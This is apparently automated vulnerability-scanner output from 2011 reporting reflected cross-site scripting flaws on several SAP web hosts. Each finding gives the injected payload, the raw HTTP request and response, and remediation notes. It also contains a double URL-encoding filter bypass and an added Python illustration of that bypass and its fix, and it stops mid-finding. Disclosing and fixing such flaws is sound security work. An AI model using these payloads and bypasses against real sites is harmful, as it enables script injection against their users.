The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 935b5<img%20src%3da%20onerror%3dalert(1)>2e12ad7827b was submitted in the REST URL parameter 1. This input was echoed as 935b5<img src=a onerror=alert(1)>2e12ad7827b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /dispatcher935b5<img%20src%3da%20onerror%3dalert(1)>2e12ad7827b/dispatcher.do? HTTP/1.1
Host: sap.webex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://connect.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:12:37 GMT
Server: Apache
Set-Cookie: galaxym=R684996998; path=/
Content-Length: 93
Set-Cookie: JSESSIONID=STpQTQWF4yrTv4sTXynlyZn73YHqKDwwhFWP2R2LVRW1dGKRCMmX!-536370640; path=/
Connection: close
Content-Type: text/html
Invalid path /dispatcher935b5<img src=a onerror=alert(1)>2e12ad7827b/dispatcher was requested
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdf7b<img%20src%3da%20onerror%3dalert(1)>588ade06a44 was submitted in the REST URL parameter 1. This input was echoed as bdf7b<img src=a onerror=alert(1)>588ade06a44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cmp0306lcbdf7b<img%20src%3da%20onerror%3dalert(1)>588ade06a44/webcomponents/widget/detect.do?siteurl=sap&LID=1&RID=2&TID=21&backUrl=%2Fmw0306lc%2Fmywebex%2Fdefault.do%3Fsiteurl%3Dsap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:42 GMT
Server: Apache
Set-Cookie: galaxym=R1412479787; path=/
Content-Length: 109
Connection: close
Content-Type: text/html
Invalid path /cmp0306lcbdf7b<img src=a onerror=alert(1)>588ade06a44/webcomponents/widget/detect was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cfb5a<img%20src%3da%20onerror%3dalert(1)>1c69d944d2e was submitted in the REST URL parameter 2. This input was echoed as cfb5a<img src=a onerror=alert(1)>1c69d944d2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cmp0306lc/webcomponentscfb5a<img%20src%3da%20onerror%3dalert(1)>1c69d944d2e/widget/detect.do?siteurl=sap&LID=1&RID=2&TID=21&backUrl=%2Fmw0306lc%2Fmywebex%2Fdefault.do%3Fsiteurl%3Dsap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:47 GMT
Server: Apache
Set-Cookie: galaxym=R3025651845; path=/
Content-Length: 99
Set-Cookie: JSESSIONID=kThMTQWL1D80cqCwXXnLmQpnVPGRvQv6tTBG7LJG4qgrrQx9QXSW!-363712497; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html
Invalid path /webcomponentscfb5a<img src=a onerror=alert(1)>1c69d944d2e/widget/detect was requested
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ce403<img%20src%3da%20onerror%3dalert(1)>1bedc97d51d was submitted in the REST URL parameter 3. This input was echoed as ce403<img src=a onerror=alert(1)>1bedc97d51d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cmp0306lc/webcomponents/widgetce403<img%20src%3da%20onerror%3dalert(1)>1bedc97d51d/detect.do?siteurl=sap&LID=1&RID=2&TID=21&backUrl=%2Fmw0306lc%2Fmywebex%2Fdefault.do%3Fsiteurl%3Dsap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:51 GMT
Server: Apache
Set-Cookie: galaxym=R684995909; path=/
Content-Length: 99
Set-Cookie: JSESSIONID=TCKjTQWPxHcpnlV9T8DGQhbgGzDHkxqtmcTZGvQ1G2r0HGj0zfpB!-630472378; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html
Invalid path /webcomponents/widgetce403<img src=a onerror=alert(1)>1bedc97d51d/detect was requested
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad53a<img%20src%3da%20onerror%3dalert(1)>2f0970f4e1a was submitted in the REST URL parameter 1. This input was echoed as ad53a<img src=a onerror=alert(1)>2f0970f4e1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /mw0306lcad53a<img%20src%3da%20onerror%3dalert(1)>2f0970f4e1a/mywebex/default.do?siteurl=sap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:29 GMT
Server: Apache
Set-Cookie: galaxym=R3366792236; path=/
Content-Length: 96
Set-Cookie: JSESSIONID=5rpTTQWZ81zgyh7rBRtjtLCwS58nRynhLwb775nnJvrglpnWB1Yl!-1025044524; path=/
Connection: close
Content-Type: text/html
Invalid path /mw0306lcad53a<img src=a onerror=alert(1)>2f0970f4e1a/mywebex/default was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 132b9<img%20src%3da%20onerror%3dalert(1)>15461ba356 was submitted in the REST URL parameter 2. This input was echoed as 132b9<img src=a onerror=alert(1)>15461ba356 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /mw0306lc/mywebex132b9<img%20src%3da%20onerror%3dalert(1)>15461ba356/default.do?siteurl=sap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787
Response
HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:34 GMT
Server: Apache
Set-Cookie: galaxym=R1412479787; path=/
Content-Length: 86
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html
Invalid path /mywebex132b9<img src=a onerror=alert(1)>15461ba356/default was requested
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 74f21<img%20src%3da%20onerror%3dalert(1)>bfa558bfac9 was submitted in the mbox parameter. This input was echoed as 74f21<img src=a onerror=alert(1)>bfa558bfac9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 555e1<script>alert(1)</script>fc75ba36069 was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the SAMLResponse request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ca1a5'><script>alert(1)</script>a5ad38de15e was submitted in the SAMLResponse parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc588<a>a60d8aca665 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8748c<a>22aed8f2a61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload 77c98<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>625c56dcaf was submitted in the xajax parameter. This input was echoed as 77c98<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>625c56dcaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623de"><a>ae987527070 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /us/en/training-locations/us623de"><a>ae987527070/atlanta,-ga-(kdc HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d67f9"><a>2515664171f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /us/en/training-locations/usd67f9"><a>2515664171f/atlanta,-ga-(kdc) HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47afa<a>61129945a2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d96f<a>5dd35e8c69e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 624e6"><a>823d4593e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload b382f<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>85060c32798 was submitted in the xajax parameter. This input was echoed as b382f<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>85060c32798 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30461"><a>e5b6240e46c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="content-t ...[SNIP]... <a href="/us/en/training-locations/us623de%22%3e%3ca%3eae98752707030461"><a>e5b6240e46c"> ...[SNIP]...
1.60. http://weblogs.sdn.sap.com/pub/wlg/27079 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://weblogs.sdn.sap.com
Path: /pub/wlg/27079
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93679"><script>alert(1)</script>7a7c3cccb42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:51:32 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17395
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head>
<title>SAP Network Blog: Dynamically Handling Structure Data Types Defined on a Remote Dictionary</title> <link href= ...[SNIP]... <a class="sapTxtSml" href="/pub/wlg/27079?page=last&93679"><script>alert(1)</script>7a7c3cccb42=1&x-showcontent=off#thread"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddb5%2522a%253d%2522b%2522cd1ccbe2671 was submitted in the REST URL parameter 5. This input was echoed as 5ddb5"a="b"cd1ccbe2671 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about/company/legal/copyright/index.epx5ddb5%2522a%253d%2522b%2522cd1ccbe2671 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 39403
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:45 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:45 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:05:45 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffeb4%2522a%253d%2522b%2522600f8c1162f was submitted in the REST URL parameter 4. This input was echoed as ffeb4"a="b"600f8c1162f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about/company/legal/impressum.epxffeb4%2522a%253d%2522b%2522600f8c1162f HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 39393
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:39 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:39 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:05:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f0dd%2522a%253d%2522b%25229f3cec84851 was submitted in the REST URL parameter 4. This input was echoed as 1f0dd"a="b"9f3cec84851 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
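Worked illustration of the double-decode bypass and of the ordering the remediation asks for (canonicalise first, validate second, encode on output). This is an added example, not code from the report or from the application it describes; the handler, the attribute it writes into (`<input ... value="...">`) and the blocked-character list are assumptions chosen to reproduce the behaviour the finding reports. The payload is the one the report submitted.

```python
from urllib.parse import unquote
import html

# Payload exactly as the report submitted it in the URL path: " and = are double-encoded.
SCANNER_PAYLOAD = "1f0dd%2522a%253d%2522b%25229f3cec84851"

# Assumed blacklist, standing in for whatever characters the application really blocks.
BLOCKED = frozenset('<>"\'')
BLOCKED_PAGE = '<p class="error">request blocked</p>'


def server_decode(raw_path_segment: str) -> str:
    """The single URL-decode the web server performs before the application sees the value."""
    return unquote(raw_path_segment)


def vulnerable_render(segment: str) -> str:
    """Hypothetical handler matching the finding: it validates the once-decoded value,
    THEN decodes it a second time, then echoes the result into a double-quoted attribute."""
    if BLOCKED & set(segment):              # %22 and %3d pass: there is no raw quote yet
        return BLOCKED_PAGE
    decoded_again = unquote(segment)        # the second decode turns %22 into "
    return f'<input type="hidden" name="page" value="{decoded_again}">'


def hardened_render(segment: str, second_decode_needed: bool = False) -> str:
    """Remediation: no second decode unless it is genuinely required; if it is,
    validate only after it (after canonicalisation); and encode for the attribute
    context on output regardless of what validation decided."""
    canonical = unquote(segment) if second_decode_needed else segment
    if BLOCKED & set(canonical):
        return BLOCKED_PAGE
    return f'<input type="hidden" name="page" value="{html.escape(canonical, quote=True)}">'


def attribute_injected(rendered: str) -> bool:
    """Did the echoed value escape its attribute and introduce a new one (a="b")?"""
    return 'a="b"' in rendered


if __name__ == "__main__":
    once = server_decode(SCANNER_PAYLOAD)
    print("application receives:", once)
    print("vulnerable          :", vulnerable_render(once))
    print("hardened, no decode :", hardened_render(once))
    print("hardened, decoded   :", hardened_render(once, second_decode_needed=True))
```

The blacklist check in `vulnerable_render` is not wrong in itself; it is simply applied to a value that is not yet in its final form, so the encoded quote slips past it and is only revealed by the later decode. Output encoding in `hardened_render` makes the page safe even when validation is skipped entirely, which is why it belongs there whatever the validation does.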
Request
GET /about/company/legal/privacy.epx1f0dd%2522a%253d%2522b%25229f3cec84851 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 39387
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:38 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:38 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:05:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e515a%2522a%253d%2522b%2522596a31fd57e was submitted in the REST URL parameter 4. This input was echoed as e515a"a="b"596a31fd57e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about/company/legal/terms_of_use.epxe515a%2522a%253d%2522b%2522596a31fd57e HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 39402
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:40 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:05:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a950b%2522a%253d%2522b%252216285773807 was submitted in the REST URL parameter 2. This input was echoed as a950b"a="b"16285773807 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
